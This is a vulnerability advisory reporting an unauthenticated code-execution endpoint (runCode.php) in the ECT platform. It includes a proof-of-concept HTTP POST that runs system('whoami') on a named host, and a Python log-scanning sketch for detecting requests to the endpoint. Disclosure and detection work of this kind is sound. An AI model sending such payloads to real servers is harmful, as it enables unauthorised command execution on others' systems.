ECT platform has a code execution vuln

BUG_Author:

glzjin

 

Affected version:

≤2.0.0

 

Vendor:

https://www.kaiyuantong.cn/

 

Software:

https://www.kaiyuantong.cn/

 

Vulnerability File:

  • /public/server/runCode.php

 

Description:

1. In the file /public/server/runCode.php there is an endpoint that receives code and executes it, and this is a pre-auth endpoint.

2. So we may send the following request to this endpoint to execute a command.

POST /server/runCode.php HTTP/1.1
Host: ect.lab.wetolink.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

code=%3C%3Fphp%20system('whoami')%3B%20%3F%3E
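
Detection sketch for defenders, added here as an example (not part of the original advisory or the vendor's code): it scans web access logs for any request that resolves to the endpoint above, including encoded, mixed-case and PATH_INFO forms of the path. It assumes Apache/nginx "combined" log format and an application served from the web root as in the request above; the function names and the sample log lines are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Path from the advisory's request line; compared case-insensitively.
TARGET = "/server/runcode.php"

# Client, request line and status of a "combined" format log line (assumed format).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def normalize_path(target):
    """Reduce a request target to a canonical lower-case path."""
    path = target.split("?", 1)[0].split("#", 1)[0]
    for _ in range(3):  # undo up to three layers of percent-encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # Collapse repeated slashes first: normpath keeps a leading "//" as-is.
    path = re.sub(r"/+", "/", "/" + path.replace("\\", "/"))
    return posixpath.normpath(path).lower()

def is_runcode_request(target):
    path = normalize_path(target)
    # PHP can route /runCode.php/extra (PATH_INFO) to the same script.
    return path == TARGET or path.startswith(TARGET + "/")

def find_runcode_hits(lines):
    """Return (ip, method, status, raw_target) for every request to the endpoint."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_runcode_request(m["target"]):
            hits.append((m["ip"], m["method"], int(m["status"]), m["target"]))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "POST /server/runCode.php HTTP/1.1" 200 12 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "POST //server/./RunCode.php?x=1 HTTP/1.1" 200 12 "-" "curl/8.0"',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "POST /server/%72unCode.php/a HTTP/1.1" 404 0 "-" "-"',
    '203.0.113.20 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [01/Jan/2024:10:02:09 +0000] "GET /docs/server/runCode.php.txt HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_runcode_hits(SAMPLE_LOG):
        print(hit)
```

Default access logs do not record the POST body, so a hit shows that the endpoint was reached, not which code was submitted.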